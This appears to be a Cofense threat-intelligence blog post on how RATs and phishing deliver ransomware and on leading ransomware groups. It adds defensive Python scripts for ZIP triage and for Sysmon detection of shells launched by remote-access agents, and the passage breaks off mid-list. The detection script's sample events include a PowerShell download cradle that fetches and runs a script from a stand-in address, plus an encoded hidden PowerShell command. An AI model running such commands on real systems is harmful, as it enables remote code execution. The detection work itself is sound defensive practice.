By Max Gannon, Cofense Phishing Defense Center
Ransomware has been a threat for some time and is frequently featured in the news. Even Ransomware incidents that cost companies relatively little compared to Business Email Compromise incidents still make the front page. That is because the actual impact of a Ransomware incident, including loss of service availability, plummeting stock prices, and potential fines, makes it a far scarier prospect for many businesses. Here we cover some of the top ways Ransomware can be delivered, along with the Ransomware families that Cofense has seen delivered directly in emails. The top malware used to deliver Ransomware was drawn from the top malware seen in Secure Email Gateway (SEG) protected environments, since campaigns that get past a SEG are the ones most likely to deliver Ransomware to enterprise customers.
Top 5 Malware Delivering Ransomware
Remote Access Trojans (RATs) are some of the most generalized malware in terms of capabilities. They are typically capable of basic keylogging, information stealing, loading additional malware, and most of what other malware types can do. Although they are not consistently the top malware type that Cofense sees, this is likely because they often require more effort to set up and maintain than simple information stealers or keyloggers. RATs also often sit in a grey area: they are frequently marketed as legitimate Remote Access Tools and sometimes even see use by legitimate companies. However, they are abused by threat actors so frequently that they are typically referred to as Remote Access Trojans despite marketing claims to the contrary.
DarkGate RAT
In 2024, DarkGate RAT was most often seen by Cofense being delivered via an attached Office document containing a link that downloads a script, which in turn delivers the DarkGate RAT binary. It has also been seen being delivered directly in tax-themed emails and via various other infection chains involving URL shortcut files. Its novel use of Office documents with specially modified embedded URLs has allowed these campaigns to bypass many Secure Email Gateways (SEGs). DarkGate RAT is a Malware-as-a-Service (MaaS) that is capable of the typical RAT functions as well as cryptocurrency mining, focused credential theft, loader capabilities, and advanced anti-analysis behavior. The various capabilities come in the form of plugins that are installed after the RAT has established persistence.
According to the NJCCIC (New Jersey Cybersecurity & Communications Integration Cell), DarkGate RAT has been used by the Ransomware groups BianLian and BlackBasta to deliver Ransomware. DarkGate RAT also technically has the option to do rudimentary encryption and ransom operations on its own, although this feature is rarely used.
Figure 1: Method Used to Deliver DarkGate RAT in 2024
Remcos RAT
Remcos RAT is most often seen in SEG-protected environments when it is delivered via an embedded link to a legitimate file-sharing site that downloads a password-protected archive. The use of legitimate file-sharing sites such as Google Drive allows these emails to bypass some SEGs while the use of password-protected archives allows them to bypass even SEGs that scan embedded URLs and attempt to download linked files. Remcos RAT has the usual RAT capabilities including running keyloggers, taking screenshots, exfiltrating files, and uploading additional malware. It is notable that despite lacking advanced anti-analysis or anti-sandbox features, this RAT remains popular due to both its ease of use and the number of free versions available online.
Remcos RAT has no historical links to Ransomware delivery and has not been specifically called out in any major incidents. However, enterprises often don’t report on what malware delivered the Ransomware, only what the Ransomware was and if it started from an email or a direct hacking attack.
Figure 2: Method Used to Deliver Remcos RAT in 2024
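One way a gateway can at least triage an archive it cannot open is to read the ZIP headers alone. The following Python script is an added example written for this article, not Cofense code or any SEG vendor's code. It flags entries with the encryption bit set (the password-protected archive technique described above), inner file types used as first stages elsewhere in this article (scripts, URL shortcut files, executables), and oversized entries, then produces a verdict without extracting anything. The extension list, the 50 MB size threshold, and the helper that builds sample archives are assumptions for illustration.

```python
"""Triage a ZIP attachment the way a gateway must: flag entries it cannot
inspect (encrypted) and inner file types that serve as first stages.
Example code added for this article, not Cofense or SEG vendor tooling.
"""
import io
import struct
import zipfile

ENCRYPTED_FLAG = 0x0001  # general-purpose bit 0: entry is encrypted

# First-stage file types seen in the delivery chains this article describes
# (scripts, URL/LNK shortcut files, executables, disk images). Assumed list
# for illustration, not a complete blocking policy.
RISKY_EXTENSIONS = {
    ".exe", ".dll", ".scr", ".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta",
    ".ps1", ".bat", ".cmd", ".url", ".lnk", ".iso", ".img",
}


def triage_zip(data: bytes, max_entry_size: int = 50 * 1024 * 1024) -> dict:
    """Inspect archive metadata without extracting any entry.

    max_entry_size is an assumed threshold above which an entry is flagged as
    oversized (padding a payload past scanner limits is a known trick).
    """
    report = {"entries": 0, "encrypted": [], "risky": [], "oversized": []}
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        report["verdict"] = "block: unreadable archive"
        return report
    for info in zf.infolist():
        if info.is_dir():
            continue
        report["entries"] += 1
        name = info.filename
        if info.flag_bits & ENCRYPTED_FLAG:
            report["encrypted"].append(name)
        ext = ("." + name.rsplit(".", 1)[-1].lower()) if "." in name else ""
        if ext in RISKY_EXTENSIONS:
            report["risky"].append(name)
        if info.file_size > max_entry_size:
            report["oversized"].append(name)
    if report["encrypted"]:
        report["verdict"] = "block: encrypted archive"  # contents cannot be scanned
    elif report["risky"] or report["oversized"]:
        report["verdict"] = "block: risky payload"
    else:
        report["verdict"] = "allow"
    return report


def build_sample(name: str, payload: bytes, encrypted: bool = False) -> bytes:
    """Constructed test input: a one-entry zip. With encrypted=True the
    encryption flag bit is set in both headers; the data itself is not
    encrypted, only the bit a scanner checks is set."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(name, payload)
    data = buf.getvalue()
    if not encrypted:
        return data
    out = bytearray(data)
    # flags sit at +6 in the local file header and +8 in the central directory
    for sig, off in ((b"PK\x03\x04", 6), (b"PK\x01\x02", 8)):
        pos = out.find(sig)
        while pos != -1:
            (flags,) = struct.unpack_from("<H", out, pos + off)
            struct.pack_into("<H", out, pos + off, flags | ENCRYPTED_FLAG)
            pos = out.find(sig, pos + 4)
    return bytes(out)


if __name__ == "__main__":
    for label, sample in [
        ("plain pdf", build_sample("statement.pdf", b"%PDF-1.4 constructed")),
        ("script inside", build_sample("Invoice_0924.pdf.js", b"// constructed")),
        ("password-protected", build_sample("Remittance.exe", b"MZ constructed", True)),
    ]:
        print(label, "->", triage_zip(sample)["verdict"])
```

The encrypted-archive verdict is deliberately a block rather than an allow: once the gateway has fetched the file from the file-sharing link, the only honest answer for an entry it cannot decrypt is that it was not scanned, which is the gap the campaign relies on.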
Async RAT
When seen in SEG-protected environments, Async RAT is typically delivered via a script that is downloaded via a URL either directly embedded in the email or in an attached PDF. Async RAT is also typically seen being delivered in batches with other RATs and stealers such as XWorm RAT, Venom RAT, and Vjw0rm. Async RAT is an open-source RAT available on GitHub with various plugins such as keylogging, credential theft, and additional malware loading. Like Remcos RAT, it lacks any advanced anti-analysis or anti-sandbox features found in subscription-based RATs like DarkGate. Again, like Remcos RAT, Async RAT is still widely used because it is freely available online and is simple enough that threat actors do not need to be experienced to use it.
Async RAT is easily capable of uploading additional malware, including Ransomware, to infected computers. SentinelLabs links the threat actor group NullBulge with the use of Async RAT to deploy LockBit Ransomware.
Figure 3: Method Used to Deliver Async RAT in 2024
XWorm RAT
XWorm RAT is seen in SEG-protected environments being delivered by either attached scripts or URL shortcut files downloaded via embedded links. Like Async RAT, it is often seen being delivered in batches with other RATs and stealers such as Venom RAT, Anarchy RAT, Silver RAT, XRed Backdoor, and Waltuhium Grabber. XWorm RAT is more advanced than Async RAT or Remcos RAT. Like DarkGate RAT it is sold as MaaS, with functionality tiered by subscription rate. Higher tiers enable the RAT to perform standard RAT actions as well as DDoS, spread via USB, replace cryptocurrency addresses in the clipboard with the threat actor's own, act as basic Ransomware, upload additional files, and perform HVNC (hidden VNC). It also has more advanced anti-analysis and anti-sandbox features built in.
XWorm RAT is easily capable of uploading additional malware, including Ransomware, to infected computers. SentinelLabs links the threat actor group NullBulge with the use of XWorm RAT to deploy LockBit Ransomware.
Figure 4: Method Used to Deliver XWorm RAT in 2024
ConnectWise RAT
In 2024, when ConnectWise RAT is seen being delivered in SEG-protected environments it is most often delivered via a URL embedded in the email body or a URL embedded in an attached PDF file. The URL eventually redirects to the ConnectWise RAT executable that is directly hosted on ScreenConnect infrastructure.
ConnectWise RAT has a large array of capabilities but is most notable for being able to run PowerShell commands, which threat actors often use to perform reconnaissance or load additional malware. ConnectWise RAT is the most legitimate of the RATs gathered here, with a large number of legitimate customers using it as part of their IT infrastructure. Ironically, it also has the most confirmed instances of being abused to spread Ransomware. According to Morphisec, ConnectWise RAT was used to deliver VegaLocker Ransomware in December of 2019. The Health Sector Cybersecurity Coordination Center (HC3) reported on an instance of Sodinokibi (REvil) Ransomware being spread laterally via ConnectWise RAT in September of 2019. In 2020 Tetra Defense reported on the APT group GOLD SOUTHFIELD using ConnectWise RAT to deploy REvil. Although threat actors no longer easily abuse it to spread laterally, they have recently begun exploiting CVEs in ConnectWise RAT to spread Ransomware such as LockBit, with groups including Black Basta actively exploiting the vulnerabilities.
Figure 5: Method Used to Deliver ConnectWise RAT in 2024
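As an added example, not Cofense or ConnectWise code, the following Python script shows the kind of process-creation detection a SOC can run for the behaviour described above: a shell or script host spawned by a remote-access agent, and PowerShell invoked with an encoded command or download cradle. The sample events are constructed using Sysmon Event ID 1 field names. The agent binary names (ScreenConnect, plus the AnyDesk, TeamViewer and Splashtop agents named in the BianLian section below), the ScreenConnect temp-script path and the 198.51.100.7 address are assumptions for illustration; verify the binary names against your own software inventory before deploying a rule like this.

```python
"""Detection logic for shells spawned by remote-access agents, run over
constructed process-creation events (Sysmon Event ID 1 field names).
Example code added for this article; not Cofense or ConnectWise tooling.
"""
import json
import re
from pathlib import PureWindowsPath

# Agent binaries for the remote-management tools this article names
# (ScreenConnect, AnyDesk, TeamViewer, Splashtop). Names are an assumption
# for illustration; check them against your own inventory.
RMM_AGENTS = {
    "screenconnect.clientservice.exe", "screenconnect.windowsclient.exe",
    "anydesk.exe", "teamviewer.exe", "teamviewer_service.exe", "srmanager.exe",
}

# Script hosts and LOLBins a remote operator launches for recon or to pull a
# second stage.
SHELLS = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe",
}

# Encoded-command switch and common PowerShell download-cradle markers.
CRADLE_RE = re.compile(
    r"-e(?:nc|ncodedcommand)?\s|downloadstring|downloadfile|invoke-webrequest"
    r"|\biex\b|invoke-expression|frombase64string",
    re.IGNORECASE,
)


def image_name(path: str) -> str:
    """Case-folded basename of a Windows image path."""
    return PureWindowsPath(path).name.lower()


def evaluate(event: dict) -> list[str]:
    """Return the rule names one event triggers (empty list = no alert)."""
    parent = image_name(event.get("ParentImage", ""))
    image = image_name(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    hits = []
    if parent in RMM_AGENTS and image in SHELLS:
        hits.append(f"rmm_spawned_shell:{parent}->{image}")
    if image in {"powershell.exe", "pwsh.exe"} and CRADLE_RE.search(cmdline):
        hits.append("powershell_download_cradle")
    return hits


def scan(lines: list[str]) -> list[tuple[str, str, list[str]]]:
    """Evaluate JSON event lines; return (UtcTime, Image, rules) per alert."""
    alerts = []
    for line in lines:
        ev = json.loads(line)
        hits = evaluate(ev)
        if hits:
            alerts.append((ev["UtcTime"], ev["Image"], hits))
    return alerts


# Constructed sample events. The ScreenConnect temp-script path mirrors how
# the product stages batch files for its run-command feature; treat the exact
# path as an assumption. 198.51.100.7 is a documentation-range address.
SAMPLE_EVENTS = [
    r'{"UtcTime": "2024-09-03 14:02:11", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe"}',
    r'{"UtcTime": "2024-09-03 14:05:40", "ParentImage": "C:\\Program Files (x86)\\ScreenConnect Client (a1b2c3d4)\\ScreenConnect.ClientService.exe", "Image": "C:\\Program Files (x86)\\ScreenConnect Client (a1b2c3d4)\\ScreenConnect.WindowsClient.exe", "CommandLine": "ScreenConnect.WindowsClient.exe"}',
    r'{"UtcTime": "2024-09-03 14:06:02", "ParentImage": "C:\\Program Files (x86)\\ScreenConnect Client (a1b2c3d4)\\ScreenConnect.ClientService.exe", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c \"C:\\Windows\\TEMP\\ScreenConnect\\24.1.1.8790\\0f3c7run.cmd\""}',
    r'{"UtcTime": "2024-09-03 14:06:03", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -nop -w hidden -enc JABhAD0AMQA="}',
    r'{"UtcTime": "2024-09-03 15:11:27", "ParentImage": "C:\\Program Files (x86)\\AnyDesk\\AnyDesk.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe IEX (New-Object Net.WebClient).DownloadString(\u0027http://198.51.100.7/up.ps1\u0027)"}',
]

if __name__ == "__main__":
    for when, image, rules in scan(SAMPLE_EVENTS):
        print(when, image_name(image), ", ".join(rules))
```

The second rule fires on the PowerShell child even though its direct parent is cmd.exe, which is why the two rules are kept independent: the agent's own helper component (event two) stays quiet, the cmd.exe launched from the agent trips the first rule, and the encoded PowerShell it then runs trips the second. In a real deployment the parent-based rule will need an exception list for the scripts your own helpdesk runs through the same tool.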
Directly Delivered Ransomware
Ransomware is most often delivered through Initial Access Brokers (IABs). Threat actors install a RAT or some other malware capable of downloading additional malware and then sell access to the infected computers. Ransomware groups buy access to specific infected machines based on the size of the company whose network has been compromised, then spread laterally across the network and deploy Ransomware to all discovered machines and drives. Some of the more advanced Ransomware groups identify and manually target enterprises deemed most profitable, using various methods to gain access to the company's infrastructure. Those events are common and typically front-page news. However, the Ransomware events most companies are likely to face originate with IABs. Here we have two exceptions seen this year by Cofense, where Ransomware was directly delivered via email, in one case bypassing a SEG.
Amarok Locker Ransomware
Amarok Locker is known for targeting non-English speakers. In its first notable campaign in February 2024, it targeted Italian language speakers and its next notable campaign that Cofense saw in July 2024 targeted Dutch language speakers. Amarok Locker exfiltrates a large number of files before encrypting infected computers. The threat actors demand payment to both retrieve encrypted files and prevent files from being leaked online. An email address and a Keybase address are provided to negotiate the ransom.
The Amarok Locker Ransomware that Cofense analyzed in 2024 bypassed Mimecast SEG to deliver an embedded Google Drive URL. The file hosted on Google Drive was too big for Google to scan, thereby bypassing some of Google’s protections. When the archive was downloaded it contained a 102 MB executable.
LockBit Ransomware
LockBit is both a Ransomware family and a Ransomware group. It is important to note, however, that the group is known as LockBit 3.0, whereas the Ransomware family can be a free version of 2.0 or even 1.0. In fact, the LockBit Ransomware seen by Cofense in 2024 was likely a free edition of an earlier version, as it exhibited none of the advanced Tactics, Techniques, and Procedures (TTPs) seen from the LockBit 3.0 Ransomware group. It was sent in .zip archives directly attached to emails, which makes it unlikely to have bypassed any SEGs and shown up in enterprise environments.
Top 5 Ransomware Groups Delivering Ransomware
Ransomware groups are organized, affiliated threat actors who either directly attack victims and install Ransomware, offer their software and services as a Ransomware-as-a-Service (RaaS) operation, or sometimes both. According to HC3, the following are the top 5 Ransomware groups seen in the last 6 months.
LockBit 3.0
The LockBit 3.0 RaaS group is the most active RaaS group targeting the U.S. Healthcare and Public Health Sector according to HC3. LockBit 3.0 utilizes several approaches to get their Ransomware on infected computers. These include direct attacks, phishing campaigns, and the use of IABs. LockBit 3.0 offers extensive customization, including the use of modules, which can make analysis and detection difficult. Once in place, LockBit 3.0 uses several methods to spread laterally including PsExec, Group Policy Objects, SMB, and compromised credentials.
BlackCat
BlackCat, or ALPHV, is a Ransomware group that operates as a RaaS. It is known for being the first to use Rust for its Ransomware, which eases cross-platform operation and helps evade security controls and signatures built for more common languages. The group typically uses compromised credentials or Microsoft Exchange vulnerabilities to gain access. Once in place, BlackCat uses several methods to spread laterally and gather information, including Group Policy Objects, AdFind, ADRecon, SoftPerfect, and compromised credentials.
BianLian
BianLian (变脸) shares its name with an earlier Android banking trojan but is a separate operation, assessed by CISA as likely Russia-based, that conducts multi-stage attacks; its first Ransomware was deployed in July 2022. Their Ransomware is modular, downloading additional plugins once in place. The group typically uses RDP credentials from IABs or phishing emails with attached malware or embedded links to download malware as its primary access method. Once in place, BianLian typically installs remote management software such as TeamViewer, Splashtop, or AnyDesk to ensure persistence. To discover the environment and spread laterally, BianLian uses tools such as SoftPerfect, SharpShares, PingCastle, PsExec, and Impacket.
Akira
Akira is both a Ransomware group and a Ransomware-as-a-Service (RaaS) group. Their most recent Ransomware strain is written in Rust, but they have used C++ in the past. They are known for conducting double extortion, charging both to decrypt data and to prevent leakage of stolen data. The group typically uses compromised credentials from an IAB to gain a foothold. Once in place, Akira typically uses tools such as Mimikatz and LaZagne to aid in privilege escalation. To discover the environment and spread laterally, Akira uses tools such as AdFind, SoftPerfect, AnyDesk, and Ngrok. Akira uses tools such as RClone, FileZilla, and WinSCP to exfiltrate stolen information.
BlackSuit
BlackSuit is similar in many ways to Royal Ransomware, which was a direct successor of the Conti operation. BlackSuit is also known for conducting double extortion, charging both to decrypt data and to prevent leakage of stolen data. Due to the overlap between BlackSuit and Royal Ransomware, it is difficult to distinguish exactly which characteristics belong only to BlackSuit. A CISA advisory notes that, once in place, BlackSuit and Royal Ransomware are both known for using the following tools to gather information and spread laterally: Cobalt Strike beacons, MobaXterm,